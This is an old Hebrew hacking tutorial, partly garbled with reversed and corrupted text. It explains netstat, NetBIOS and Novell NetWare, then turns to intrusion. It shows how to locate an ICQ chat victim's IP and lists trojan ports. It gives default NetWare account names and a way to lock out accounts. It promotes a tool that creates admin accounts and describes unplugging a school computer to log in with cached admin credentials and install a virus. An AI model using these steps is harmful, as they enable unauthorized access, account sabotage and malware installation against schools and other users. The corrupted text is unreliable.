%./o!sNso+eM8o&/e"
!!דואמ ושפ
3*$
:ל המוד
:ודילקה ושפ (סואודניוול רוזחל םיצור םתאו (סוד בצמב בשחמה תא םתלעפה םתא םא
1 .
Ex%$
2 .
:ב תויהל ךרוצ שי(
( C2P!%./o!s
!%.
/%"
:אמגודל (הייקיתה וא ןנוכה לש םייחכונה תויקיתהו םיצבקה לכ תא גיצת
:וצחל הנוילעה המרב םתאשכ
D%" !%./o!s
רהמ רבוע הזש (איה היעבה (סואודניוו לש תויקיתהו םיצבקה לכ לש הכורא המישר עיפות
:ךכ ומשר ןכל (ידימ
D%"N, so+e$-%.0
.ךישמי אל הז (רAנAא וצחלתש דע (דומע לכ רוצעי הזו
8$,
F%&e 6"4.s8e" 3"o$9o& לש ת$ר
החיתפ י$ע יפ י פא ירתאל תשגל ןתינ (נרניאה ג$ע םיצבק תרבעהל דעונש לוקוורפ
:תרחא
ftp://x.x.com
.אמגודל
$e&.e$
תומוקממ !וח( רופ לכב םוקמ לוכל סנכיהל הלוכי (איהש קר (םיצבק תרבעהל המוד ךרד
.תודוקפ לע תססובמ איהשו ()םינגומ
S+,$ R ,o,3
.ל$אוד תלבקו תרבעה םירשפאמ (ל$אוד יתרש
3"oxy
+יל רוזעל לוכי הז המו +לזאזעל הז המ לבא (יסקורפ לע םירבדמ םישנא הברה כ$כ
(ךכ היונב תשרה (יק וא
:אבה םישרתב ביה ולכתסה
3+J
1 1 1 '1 2 1 '1 3 1 '1 4 1
1 5 1 '1 6 1 '1 7 1 '1 8 1
אוה הלחתהב ( )דבלב אמגודל( הלאוול עיגמ אוהש דע דבוע בשחמהש בשחמ הנומש שיש דיגנ
ל עיגמ 1 ל זאו 2 .האלה ןכו (
תורישי רובעל ךלש בשחמה לכוי אב ךרדה תא שפחמ םצעב אוה השוע יסקורפה תרשש המ
1 בשחממ 1 1 בשחמל 1 8 :הז אוה ןורסיחה (ןורתיה הז (הלאוו הזש 1
(ןמז אל חקיש המ (אצמי אל לבא (ךרד שפחי יסקורפ תרשהש (הז הרקיש המש (תויהל לוכי
!הליגרה ךרדב םיבשחמה לכ ךרד תכלל ךירצ דוע אוה הז ירחאו
1 בשחממ רמולכ 1 1 בשחמ דע 1 8 .1
:יסקורפ תרשל תורבחתה
תורדגה2תויורשקתה2נרניא תויורשפא2םילכל וכלו ררולפסקאל וסנכיה
.יסקורפ תרשב שמתשה$ לש תורשפאה תא ונמסו
כ$דב אוה )האיצי( רופהו םכלש נרניאה תיקפס תא לואשל וכרתצת תבותכה תא 8080 (
:איה תבותכה ימואלניב קזבב
Pro')%be(eOint%net
HaSaTan
NetBIOS
!קוסעת הבתכה המ לע ךרעב תעדל םילוכי רבכ םתא (סקדניאה יפלו תרתוכה יפל (זא
'ב הצירפה תא ריבסת תאזה הבתכה (וישכע ריבסא ינא ןיבה לש ימל NetBIOS םתאש ןוכנ (
קסעה לכ ךיא תוארל ידכ (קימענ הפי ונחנא םויה לבא (הז תא םישוע ךיא םיעדוי רבכ
!דבוע הזה ןברוחמה
:םיללכ השולש (הז ינפל
1 !!!!עדי הברה םכל #יסות איה (תאזה הבתכה תא אורקל םכל יאדכ .
2 ןויליגב םירחא םיבשחמל הצירפ לש הבתכה תא םתארש ינפל תאז הבתכ אורקל ןיא . 5 !!!
3 הברה הפ שי יכ (םייסיסב םירבדב ליחתמ ינאש הז לע יתוא ומישאת לע ליחתמ ינאש ינפל .
אל אל ל'כ'ה ריבסיו (םהלש ךאלמה היהי ינא (םהלש םייחהמ םולכ םיעדוי אלש םישנא
!!ר'ו'ר'בו
!םייתושו םירבד לע בכעתמ ינא המל יתוא ולאשת לע השקב זא
!הבתכה תא ליחתהל ןכומ ינא הז ירחא (והז
( NetBIOS (Network Basic Input/Output Syste הרצונ הנכותה לש תילניגרואה אסרגה (
י$ע sytek 'ו IBM םדומ ילעב םיתנכתמל קפסל התייה הנכותה תרמ ( LAN םא קשממ
רשק רוציל הדעונ הנכותה (קפס אלל ()תרבודמ תירבעב (םיפותיש( םיפסונ םיבשחמל תרושקת
!)...םייתניב( רחא רבד םוש אל תורחא תותשר םא
לש הדובעה קשממ NetBIOS ךרד םכרדל םחלשלו םיבוכיע אלל תונכות רציל םיתנכתמל רזע
.םיתנכתמהמ תויעבו לבס הברה ךסחו (תונושה בשחמה תותשר
:אמגודל (םיתרשו םיבשחמ תרושקית לש םיגוס הברה דוע םנשי
OSI ארקנש הזה רבדה ( OSI 'מ בכרומ 7 (עבשה תא הפ רפא אל ינא (רוקמ דוק לש תובכש
לכל (ןורקיעה תא ריבסא קר ינא (רומגא אל ינא יכ phact !בוקב לכתסיש (הז המ עדוי אלש ימ(
ןויליגבש דרווה 10 תארקנש הנכותל חלוש בשחמהש )םיימעפ ריבסהל חוכ יל ןיא ( OSI שי
'המ לבקתמה עדימה תבלצה י$ע (עדימה רבעומ םצעב ךכ (םיוסמ רדס יפל תולועפ העבש
phact 'ה לא OSI 'ל ותלבקהו OSI .)!בושח אל הז םתנבה אל םא(
!םתוא רפל ןמזה אל הזו רישי ןפואב עדימ תוריבעמש תונכות יגוס המכ דוע םנשי
NetBIOS (נרזא( הב םיכמות םילוקוורפ הברהש תפתושמ דואמ הנכות יהוז APP, IUS
בשחמ לכל השיג לש תורשפאה תפסוה()"וכו PC רתוי )...חחח( תיפותישל הנכותה תא ךפה
!דימתמ
ןויליגב (תאז תושעל דציכ רבסה( הנכותב #תתשמש בשחמ לכ 5 לדחמ תרירבה (םש לבקמ ()
$ :איה guest םא (הצובקכ הנכותל #רתצמ אוה םא קר (התוא תונשל #תתשמה תורשפאב םש ($
'מ בכרויש (יארקא םש לבקי אוה דיחיכ רבחתי אוה 15 לש תמויסה םע תויתוא NnetBIOS .
:הזכ והשמ רמולכ .תשר התואב םישמתשמה לכ לש הלב םילבקמ שמתשמ וא הצובק לכ
3+N
NetBIOS Remote Machine Name Table
Name Type Status
'''''''''''''''''''''''''''''''''''''''''''''
COMPUTER <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
COMPUTER <00> UNIQUE Registered
'שכ unique 'ו (יארקא םש םע דיחי שמתשמ גציימ group 'ה תרוש (הצובק גציימ )ןבומכ(
status תא םיגציימ םירפסמהו (אל וא תשרב דחיב םירבוחמ ל$נה םיבשחמה םאה (הארמ
!דיחיב וא הצובקב םיבשחמה רפסמ
:הרעה
'ה תנכות לש םירופה ירפסמ הנה (תעדל הצורש ימל % NetBIOS :
137
138
'ו 139 .
!הנשמ אל אל םאו (והשמ םתנבהש הווקמ ינא (םויהל והז
HaSaTaN
Netstat
הז המ.א Netstat +
Netstat םע דחיב העיגמש הנכות איה Win .תוהובג דואמ תולוכי ול שיו
המ רידגנ דוע( םימייק הז תא תלעפהש עגרבש םירוביחה לכ תא ךל תוארהל הז השוע איהש המ
.)םימייק הז
:ךל הארמ םצעב איה Routing table .םילוקוורפה לכב
% %

%
: +האלה המ .ב
:ב תבכרומו סוד בצמ תדבועש תרחא הנכות לכב ומכ Win םג Netstat .םירמרפ תלבקמ
.+ :ןבומכ הז (הארנש ןושארה רמרפה
.)%%לאמשל ורשית%%( :הלעפה 2 לחתה :וצחל
netstat +,
:ב שיש םיירשפאה םירמרפה לכ הז ' האצותה Netstat .
.נרניאל יתרבחתה (יקוא
:רמרפה לע וישכע דובענ ונחנא a רות םימייקה םירוביחה לכ תא גיצמ( ' client רותב אלו
Server .)
%%%%%לאמשל ורשית%%%%%
C:\windows>netstat -a

3+.
Active Connections

Proto Local Address Foreign Address State
TCP LocalHost:1031 dwarf.box.sk:ftp ESTABLISHED
TCP LocalHost:1036 dwarf.box.sk:ftp-data TIME_WAIT
TCP LocalHost:1043 banners.egroups.com:80 FIN_WAIT_2
TCP LocalHost:1045 mail2.mtnl.net.in:pop3 TIME_WAIT
TCP LocalHost:1052 zztop.boxnetwork.net:80 ESTABLISHED
TCP LocalHost:1053 mail2.mtnl.net.in:pop3 TIME_WAIT
UDP LocalHost:1025 %:%
UDP LocalHost:nbdatagram %:%

:אמגודל תחא הרוש חקינ
TCP LocalHost:1031 dwarf.box.sk:ftp ESTABLISHED
:הז הפ םיאור ונחנאש ןושארה ךרעה TCP :הפ תויהל לוכי (לוקוורפה םש הז .
1 . TCP
2 . Transmission Control Protocol
3 . UDP
4 . User Datagram Protocol
5 . IP
6 . Internet Protocol
'ה תסרגו הרמוחה (םיביכרה (בשחמה גוסב יולת לכה Windows .
: :אוה אבה ךרעה LocalHost 'ה תא תנקתהשכ תרדגהש םשה תא ונל רמוא הז Win שמשל
לע ריבסמש ילש ךירדמה תא ארקש ימ :הרעה( ךלש בשחמל תשר םשכ NetBeuI הז תא ןיבמ
.) :'( בו רתוי
.חתפ בשחמהש ימינפב רופה הז אבה ךרעה
:ןק רבסה
:םירופ יגוס יתש םנשי
.ימינפ רופ .א
.ינוציח רופ .ב
.םיימינפה םירופהמ םירכומ רתוי הברה םיינוציחה םירופה
:ה הלא םיינוציחה םירופה HTTP÷80 FTP÷21 TELNET÷23 הלאה םירופה ("וכו
'ה לע םיחתפנ םהש ללגב םיינוציח םיארקנ Server .ךלש בשחמה לע אלו
...םיינוציחה םירופה םע רשק רוציל ליבשב ךלש בשחמה לע םיחתפנ םיימינפ םירופ
:בו רתוי הז תא ריבסי ןק םישרת
3+;
LocalHost :client 'ב ימינפ רופ חתפנ .' LocalHost 'ל חלשנ עדימ .' IP .םיוסמ
ServerHost :host לש היינפ בקע תרשה לע ינוציח רופ חתפנ .' LocalHost עדימ .'
'מ לבקתמ IP .םיוסמ
:הרעה
'מ םילודג ויהי דימת םיימינפ םירופ 1024 .
!יפוי +םתנבה
'ה לש םשה תא ונל ןתונ אבה ךרעה Host תרוצב ASCII 'ב אל ונעי( ירפסמ ךרעב אלו IP אלא
.)סוהב
:אוה ךרעה ונלש הרקמב dwarf.box.sk .
'ה לע חותפה ינוציחה רופה תא ונל הארמ אבה ךרעה Host וב לוקוורפה לש םשה תא וא
.עדימה רבעומ
:םיאור ונחנא (ונלש הרקמב ftp :
'ה לוקוורפב רבודמש ןיבהל םילוכי רבכ םתאו FTP .
ותוא םע ונלש תורבחתהה תאצמנ וב בצמה תא ונל ןתונ (אבה ךרעה Host .
ךירדמ (רחא ךירדמל םיאתמ רבכ הז (הזה רבדה לש הבחרה תועמשמה לע ביחרהל הצור אל ינא
.ךירדמ וילע בותכי ינא והשיתמ ילוא (תשרב םיבצמ לע
:אוה (ונלש תורבחתהה תאצמנ וב בצמה (הרקמ לכב ESTABLISHED .
.תויעב םוש אלל ןמזה לכ םרוז עדימהו תססובמ תורבחתהה (רמוא הזש
רמרפה a םירופו םילוקוורפ לש המישר ונל ןתונ אוה .םירקמה בורב שמושמ ךרדב אוה '
:ה לע רמולכ (ונלש בשחמה לע םיחותפש LocalHost ונל שי םא קודבל ידכ ליעי דואמ םג אוה .
.בשחמה לע יניור סוס
!ירנש עגרב Netstat -a .יוארכ הזב לפל לכונ יניור'סוס לש רופ :הארנו
אל ונחנא )...קמעס( $םירקאה$ ונחנא לבא (תולקב רתוי הברה הזב תולפמש תונכות שיש ןוכנ
$ רותפכ לע !וחלל רשאמ (ינדי ןפואב יניורב לפל #יכ רתוי הברה הזמ !וח .תונכות םיכירצ
scan .הנכסמ הנכות הזיאב $

:בגא ךרד
Port 12345(TCP) Netbus
Port 31337(UDP) Back Orifice

% %
%
רמרפב שומיש .ג n : '
:בושח דואמ רמרפ דוע ונשי (האלה םדקתנ (יקוא n קר רבדה ותוא תא ונל הארמ אוה '
ירפסמ ונעי( םיירפסמ םיכרעב IP .)
:אמגוד הארנ
%%לאמשל ורשית%%
C:\>netstat -n
39*

Active Connections

Proto Local Address Foreign Address State
TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED
TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2
TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT
TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED
TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT
!םינק םילדבה םנשי ךא תומוד תואצותה (בל ומיש
:ןיעל דואמ םירורבש םינושארה םילדבהה יתש תא םיאור ונחנא (ןושאר רבד
1 :בש ךרעה . a :ונל איבה ' LocalHost 'ה תא ונל איבמ וישכע IP ילאקולה שמתשמה לש
.)התא ונעי(
2 +)םיניינעה תא זרזל לוכיש רבד( תויתוא תרוצב אלו םירפסמ תרוצב הארנ סוהה לש ךרעה .
:ש הז אוה (בל םתמש אלש לדבהה n 'מ !וח לוקוורפ לכמ םלעתמ ' UDP היהת םאש (רמולכ .
תורבחתה UDP :וצחלתו
netstat -n לש לודג תיסחי ןורסיח הז (התוא וארת אל N !! '
:ב שמתשהל ולכות n 'ה רפסמ תא תולגל ידכ ' IP :םג תושעל ולכותש ןבומכ (םכלש
:הלעפה .' לחתה
winipcfg רפסמ .' IP .
...םכל אבש המ ושעת ....לבא
:ישעמה בלשה .ד

.יקוא
:תושעל ךירצש דואמ םייסיסב םירבד יתש םנשי הצירפ לכב
'ה תא ריתסהל .א IP .ךלש
'ה תא תולגל .ב IP .ןברקה לש
'ה תרתסהל תונכות ינימ לכב שמתשהל תוסנל םישנא וליחתה )שמח םייתנש( ןורחאה ןמזב IP
יוליגן IP אל םתא םגש וארת םתאו (הלאה תויושה תא בהוא אל שממ ינא םירחא םישנא לש
...........הז תא ובהאת שממ
I Seek You וא ICQ יעצמא וב רידחהל וסינ הז ללגבו (וב םישמתשמ םישנא אלמש ילכ אוה
.)םילוז( תוחיב
39+
'ה ךותב ICQ ריתסמ ונשי IP תא תושעל תוסנמש תונכותה ראש ומכ ליעי וניא הז רבד .הנבומ
.הלועפה
תולגל לוכי )!!התא !ןכ (ןכ( התא IP שמתשמ לכ לש ICQ !ךל אב קרש
:םיאבה םיכילתה ירחא בוקע
1 :הלעפה .' הלחתה :ל ךל ) coammand .
2 :םושר ךל חתפנש סוד ןולחב ) netstat -n > log1.txt
3 :תויקית וא םיצבק .' שופיח .' לחתה :!חל ) log1.txt ותוא קיתעת ' !בוק ךל אצמי אוה '
ןחלושל
.)ךשמהב וב שמתשנ ונחנא( הדובע
4 'ה תא חתפ תעכ ) ICQ )ידכ ךות תויהל בייח( וי"צ ידכ ךות (ןברקה םע ו"צל ליחתתו
:דלקה
netstat -n > log2.txt וב שמתשנ ונחנא( הדובע ןחלושל ותוא קיתעת ' !בוק ךל אצמי אוה '
.)ךשמהב
5 !רוכז (םיצבקה יתש ןיב האוושה השעת (וישכע )
log1.txt תא חתפ וישכע ' בו וילע לכתסה (ירוקמה !בוקה אוה log2.txt הארת התא
#סוותהש IP !
'ה והז IP .ןברקה לש
םירבדה תא וניבת אל םתאו הפל דע הבתכה תא םתנבה אל זא (יתישע המ םתנבה אל םא
!בותכל ךלוה ינאש םיאבה
!םעפ דועו םעפ דוע לכה תא וארק
:ב שומיש .ה p : '
:ב ונשמתשהשכ (וישכע דע n :בו ' a שי םהבש םילוקוורפה לכ לש המישר ונלביק '
.ןהשלכ תויורבחתה
לוקוורפמ קר תויורבחתהה תא קר תוארל הצור התאש חיננ TCP +םישוע המ (
רמרפה תא שי ליבשב p .'
:אמגוד ואר
C:\>netstat -p tcp

Active Connections

Proto Local Address Foreign Address State
TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED
TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2
TCP ankit:1069 mail2.mtnl.net.in:pop3 TIME_WAIT
TCP ankit:1078 mail2.mtnl.net.in:pop3 TIME_WAIT
TCP ankit:1080 mail2.mtnl.net.in:pop3 TIME_WAIT
399
TCP ankit:1081 www.burstnet.com:80 FIN_WAIT_2
TCP ankit:1083 zztop.boxnetwork.net:80 TIME_WAIT
גוסמ םירוביחה תא קר ונל הארת תאזה הלבה TCP :ונבתכש ירחא יכ ( n ונמשר ' TCP .
לוקוורפב םירוביחמ !וח רחא רבד םוש הארנ אל זא TCP .
'ה תנכותב העודי שממ אל הקינכ הנשי Netstat .םיריכמ שממ אל םישנאש
.תחא תבב םירמרפ םירמרפ המכ בלשל רשפא
:ריבסנ
'ב קר תויורבחתהה לכ תא הצור התאש חיננ TCP המ ...תויתוא תרוצב אלו ירפסמ מרופב
+השוע התא
:הככ זא
netstat -p tcp -n
:הז תא לבקת התא
Proto Local Address Foreign Address State
TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED
TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2
TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT
TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT
TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED
TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT
!רורב הזש הווקמ ינא
% %
%
:רמרפב שומיש .ו e : '
: .....ונל איצומ הז המ הארנ ואוב םדוק
Interface Statistics
Received Sent
Bytes 1220282 267383
Unicast packets 3327 3204
393
Non-unicast packets 45 45
Discards 0 0
Errors 0 0
Unknown protocols 50
לש ןורתפהמ יצח (לוקוורפ הזיאב הלקת םכל שיש חיננ (תויעב רותיאל ליעי דואמ הז רמרפ
:י$ע תולקב הז תא תושעל ולכות (היעבה הפיא תולגל הז היעבה
netstat -e !!
.םירבסה הברה ךירצ אלו רורב דואמ ונל אציש לפה
HaSaTaN
Novel
:לכה ינפל
יססובמ םה ס$היב תשרה יתרש בורש תעדל םכל יאדכ % novell netware תאזה הבתכהש ךכ
.)!!!( םניחל אל
הלחתההמ הבתכה תא אורקל שיש ךכ !הצירפל רשי שגינ אל ינאו (םיעק יפל היונב הבתכה %%
!#וסה דעו
לע רתויב הפיקמה הבתכה וז%%% novell !! תירבעב םעפ'יא התשענש
'לש תשר תרשה novell netware :ארקי וישכעמש( NN ססובמ ()קסעה לכ תא רצקל ליבשב
ומכ אלש .תותשר לש הלעפה תכרעמ לע unix 'ו NT ( לבונב ( NN .תחא תינכותב לכה אצמנ אל )
.)לכה ריבסא ינא (וגאדת לע(
NN ( סוד יבג לע בשחמה תלעפה תלחתהב !ר ומצע DOS :אבה רבדה ומכ () ms-dos םתאש
'ה ךכ (םיריכמ יאדוו NN :ארקנש המוד רבד בשחמה תליחתב !ירמ dr-dos ךכ םושמו (
!רבד ותוא עמכ םה תודוקפה
'בצמל עיגה בשחמהשכ DOS 'ה ()בשחמה תלעפה רחאל( NN ומצע תא !ירהל ליחתמ
.שמתשמהמ תודוקפל הכחמו (תשרה לע בשוי )#וס #וס( תרשה םייס אוהש עגרב (תיתמווא
'ה NN 'ה תילש לש םיחש יתש !ירמ admin :דחאה ( consol :ארקנ ינשהו NDS המ(
.)!ל'ו'כ'ה יבסי ינא +םיצוחל םתא
39:
'ה םה המ consol 'הו NDS +
1 'ה. consol :
+והמ
Ok 'הש ובש בצמה והז (ךבוסמ ךכ לכ אל הז ( adminn 'ה לע )דקופ( לוש NN תשקה י$ע
'לש תודוקפל )תומוד שממ( תומודה תודוקפ ms-dos .
רותבש (תויהל לוכי (אמגודל admin בצמב לבקת consol :אבה רבדה תא
.לאמשל סקה תא ורשית +ללכה תא םירכוז% ctrl (לאמשל רושיי ליבשב (םיילאמש פיש )
ו ctrl ו shift רושיי (תירבע לש בצמל ריזחהל ידכב םיינמי
%ןימיל
C:\WINDOWS .
+ןוכנ (ולבקתש םתבשחש המ הז
)' ןוכנ אל (אל ')
!רחא והשמ ולבקת םתא תעכ (םכמוקמ לע תאזה הרוצב םירפ ולבקת אל םתא
:אבה רבדה תא ולבקת םתא
%לאמשל ורשית%
GANDALF :
!+הז המ (יתוא ולאשת
'ה תודוקפ (םכל ריבסא ינא console 'ה לש םישמתשמב וא םיצבקב לופיל ודעונ אל NN אלא
!ו'מ'צ'ע תרשה לוהינב
הלעפה תכרעמ לכ ךרד םהב לפל רשפא (םישמתשמהו םיצבקה לש (הלאה תודוקפה תא
:אמגודל
unix, linux ,NT ,windows "וכו
+םתנבה אל
!רורב רתוי ריבסנ
בצמה םא console 'ב ומכ והשמ בתוכ היה תמאב אוה םישמתשמו םיצבק לוהינל דעוימ היה
ms-dos תונוש הפי תודוקפ שיו (הז תא ךירצ אל (ומצע תרשב לפפל דעונ אוהש ללגב לבא (
'בצמה ליבשב console .
הלעפה תכרעמ לכ ךרד םהב לפל רשפא (םישמתשמהו םיצבקה לש (הלאה תודוקפה תא
:אמגודל
unix, linux ,NT ,windows .המודכו
בצמב העיפויש רבדה (רמוא הז המ קודבנ ואוב (וישכע console :הז המ
GANDALF :
!דואמ ושפ הז
'ה (הז עגרב (תרשה לש םשה הז admin ארקנש תרשה ךרוצל קר תודוקפב שמתשהל לכוי
:הפ המ םושמ GANDALF !
+אל (ושפ יד
2 . 'ה NDS :םג ארקנש Netware Directory Service
'ה בצמ והמ NDS +הלחתהב ונרביד וילעש
39=
ok 'ה (םיצבקהו םישמתשמה יבגל היצמרופניאה לכ אצמנ וב םוקמה והז ( NDS לכ תא קיזחמ
םיצור םתא יאדוול בורקש םירבדה דחא תמאב הז (לבונ לש הלעפהה תכרעמ יבגל היצמרופיאה
)+++אל (לבונ לש תונובשח #יעהל( םהילע דומלל
'ה לש תאזה המיהדמה הנכותה NDS :ארקנש !בוק רותב תאצמנ nwadmn32.exe ושפ
!ותוא ושפח
דעונ הזה שומישה ()....ללכ ךרדב( תינוחב היעב הזב ןיא ללכ ךרדב יכ (םש תויהל בייח אוה
.םישמתשמה לש )םשו אמסיס( ינותנב הייפצל כ$דב
.םתוא אורקל לכות כ$דב ךא (םירפה תא תונשל לכות אלש יאדוול בורק
++ לבונ !ירמ םכלש ס$היב לש תרשה םא תעדל םירומא םתא לזאזעל ךיא
!ושפ יד הז (תמאה
!אמסיסהו שמתשמ םשה תא שקבי אוה ךלש הלעפהה תרעמל סנכיתש יתמ
$ תרוצב הארנש לבונה לש שפומה וגולה תא הארת התא המש N .םודאב תשגדומ $
:הלאש
ינא ךיא !רתוי אל לבא (ליגר ןובשח יל שיש עדוי ינא (לבו ןובשח יל שי םא חוב אל ןיידע ינא
+הז תא קודבל לוכי
:הבושת
הבורק השיג שישכ דימת (דואמ םילק םייחה תא ךל השעי הז יתימא ןובשח ךל שי םאש ןבומכ
:הז תא םיקדוב ךכ (הרקמ לכב לבא (ןובשח אלל (ספא לע ליחתהלמ הפידע רתוי
'ל סנכית windows !שמתשמה םש תאו )שי םא( אמסיסה תא !חלת םשו
$ תואה םש העיפומ םא קודבתו (תומישמ תרושב (המל לכתסת (הז ירחא N דעונ הז רבד ($
!השיג ךל שי רמולכ (םהלש ןובשחה תא להל םיצורש םישמתשמל
$ תואה לע םיצחולשכ םיעיגמ וילאש רבדה ךותב N ינאש תוניינעמ דואמ תויצופא המכ שי $
!ךשמהב םהילע רפא
:איה היינש תורשפא
( ילש בשחמל סנכית my computer ךרדב םהש (תשרה יננוכ דחא לע תינמי הציחל !חלת םשו )
םיארקנ אל (ללכ A, B, C 'ו ( D םא תויורשפא המכ שי ךל חתפנש ירפתבש האור התא םא .
תואה N !ןובשח ךל שי (
......ושפ יד
הלאש :
םא תימווא תלבקמ תכרעמהש תונובשח הזיא (ןובשח יל ןיא ......מממממממממממממא
+תרשה לע התנקתה
+דבועש ןובשח אוצמל לוכי ינא ךיאו
:הבושת
:ותרמו )אמסיס ןיא תונובשח הלאכב( שמתשמה םש (רבד לכ לש המישרה הנה זא (יקוא
רבד םא (רתויב םיבושחה םירבדה תא קר אלא (המישרה לכ תא איבהי אל ינא :הנק הרעה דוע
ל$נכ בותכ היהי( רבד ותואל םישמשמש שמתשמ תומשב שמתשהל וסנת (םכל דבוע אל דחא
.)םדוקה רבדב הלעמל רמאנ הז םא
)ןובשחה םש( שמתשמה םש ימוואה ןובשחה תרמ

PRINT הספדהה תורש ןתמל דעונ
LASER הנוש קר (ל$נכ
HPLASER הנוש קר (ל$נכ
PRINTER הנוש קר (ל$נכ
LASERWRITER הנוש קר (ל$נכ
POST ינורקלא ראוד תלבקו תחילש תוריש ןתמל דעונ
MAIL הנוש קר (ל$נכ
GATEWAY תותשרה יתש תא רבחמש בשחמל הסינכ
GATE הנוש קר (ל$נכ
39J
ROUTER ליימיא תחילש לש תוריש ןתמ
BACKUP הבתכה ךשמהב םירפ (אמסיסב לבגוי הז רבדש תויהל לוכי (יוביג
WANGTEK הנוש קר (ל$נכ
FAX סקפה לש םדומל השיג ןתנ
FAXUSER הנוש קר (ל$נכ
FAXWORKS הנוש קר (ל$נכ
:הלאש
:שמתשתמ םשה םע ןובשח םא תעדל רומא ינא ךיא x +ליעפ )דבלב אמגוד(
:הבושת
!ןימז ןובשחהש ןבומכ (תדבוע איה םאו (התוא הסנ אמסיסה תא עדוי התא םא
" לבקמ התא םא (לבא error password הלימה תא וב שיש והשמ וא " password בותכש וא (
" האבה העדוהה תא unknow error .הנוש הז ("
" :לבקת םא error password !ותמסיס תא עדוי אל התא לבא (ליעפ ןובשחה "
" :לבקת םאו unknow error !ללכב ןובשח וניא ןובשחה "
!ןשקאה ליחתמ וישכע
:הלאש
+דבוע אלש ןובשחל (דבוע ןובשח ךופהל לוכי ינא ךיא
:הבושת
ok !םכל דיגי ינאש ירחא וקחצית םתאש (ושפ ךכ לכ הז (
לכ admin אמסיס לבקל ךישמי בשחמה םהב םימעפה רפסמ תא תונשל תורשפאה תא לבקמ
'ה בור לבא (תחא םעפ איה לדחמה תרירב (הנוכנ אל admins !הז תא םיפילחמ
!ןימז אלל (ןימז ןובשח ךופהל םיבלשה הנה לבא (תושעל ךירצ המ םתנבה רבכ חב זא
1 וחק זא (היוגש אמסיס לבקי בשחמה םימעפ המכ גשומ םכל ןיאש ןובשחב וחק לכ םדוק .
'ה לש תושפיב יולת הז( ןמז תצק בוה הרקמב וא (ןמז הברה וילע תויהל ולכותש בשחמ
admin .)!!! להנמה אוהש
2 'ב איהש אמסיס ושיקהו (שמתשמ םשה תא ושיקה . 100º וצחיל (הנוכנ אל ENTER (
תעדוה םילבקמ םתא error םימעפ המכ וצחלית (תויהל ךירצש המ קוידב הז (יפוי +ןוכנ (
ךכ )ןבומכ היוגש אמסיס םע( הסינכ לע רתוי וצחליתש המכ (םעפ דועו םעפ דוע (םילוכי םתאש
'הש דע ןובשחה תא לוענל םכלש יוכיסה לדגי admin תא תושעל לוכי אוה( ןובשחה תא ריזחי
.תימווא הז
:הלאש
+היש דוע ריכמ התא ילוא (םכח הזכ התא עדוי התא (דיגת
:הבושת
:תארקנש הנכות שי (ןבומכ (האמחמה לע הדות NW-HACK.exe 'ב התוא ושפח google.com
:ךכ הז השוע הנכותהש המ (ואצמת חוב
( ןימדאל הכחמ הנכותה (התלעפה ירחא admin אוהש וליאכ הזש( תרצוי איה סנכנ אוהש יתמו )
'ה (רצי admin !!! םכליבשב ןובשח )
cool
:הלאש
++היש דוע שי לבא (ןפצוח תצק ינאש עדוי ינא
:הבושת
!הבינגמ יד היש אקווד !ןבומכ (ינש רבד (לואשל שיבתת לע (לכ םדוק
:הרהבה
%אורקל בושח%
'ב םכל רוזעי הז (ולהבית לא (היגלוכיספ תצק איבי ינא תאזה הרהבהב% 100º %!זוחא
39N
( ןימדא ןובשח םהל שיש םישנאה בור admin םיבשחמב םיניבמש םישנאה םהש םיבשוח )
( םהלש תכרעמה יבגל םלועב רחא םדא ןב לכמ רתוי novell םתאש םיבשוח םםה (רבד דועו ()
!םלועב םיוידיא יכה םדא'ינבה
!תוע היהי רבכ הז (תאזה הבתכה תא וניבתו וארקתש ירחא לבא (םיקדוצ םה כ$דב
ןימדא םע דובעל לק רתוי הברה םכל היהי (הלעמל #אה םע םיאצמנ םהש בו יד הז (הרקמ לכב
( admin $תמכחותמ$ה תכרעמה ךותל ורדחי הלאה םימחר'יררועמה םידליה (םתאש חובש )
!ולש
ואיצות לאו (םולכ ודיגת לע (םיבשחמב םכלש התיכב רתויב םינואגה םתא םא וליפאש (הככ (זא
!הגה
:)+הא (הזל םתיכיח( ישעמה עקל וישכע (והז
:תוארוהה תא עצב
1 ( הרומהש הכחת ()ךליבשב השק תויהל רומא אל הז( םמומ ומכ הארת . admin אצי )
:םיאבה םירבדה תא עצבתו ולש בשחמל ךלית (תשרהמ
2 בשחמה תא הבכת .
3 )ןופל לש ומכ הפי הארנ( תשרה לש עקשה תא איצות .
4 אוהשכ הדובע ןחלושל !ופקיו ()םולכ יתרמא אל ןיידע (וכח( תשרב אל התאש ההזי בשחמה .
הז םאש ךכ (בשחמה לע היהש ןורחאה שמתשמה לש )שמתשמ םשו אמסיס( םינותנב שמתשמ
'ה admin (סוריוו וניקתת( הנכות לכ ןיקתהלו (הצרתש רבד לכ תושעל תוכזו האשרה לבקת
!ןנוכ לכב )הזכ והשמ
5 וריזחת ושפ ()ןורתיפ שי (וגאדת לא ...הסעב( תשרל רבחתהל לוכי אל התא (תחא היעב שי .
.עקשה לא תשרה לש לבכה תא
6 'ה םא (דובעל רומא הז לכ . admin 'ב ליב אל אוהו ()...תונידע םילימ הזיא( םכח ךכ לכ אל
registery תייקית לש תורשפאה תא temp םיצבק תרימשל תשמשמ תאזה הייקיתה (
!אמסיסהו םשה תא הז רמוש אוהש םיצבקה דחא (דואמ בורקב םהב שמתשי בשחמהש
'ב registery !הז תא לבל תורשפא שי
7 והשמל ךלש ןובשחה תא $ןכדע$ל וא (תויורשפא יתש ךל שי (ךבוסמ רתוי הפיה בלשה הז .
.רבד לכ יונישל תויורשפאה לכ תא וב היהיש
'ה ךרד תושעל לוכי התא הז לכ תא NDS !וילע יתרבסה רבכש
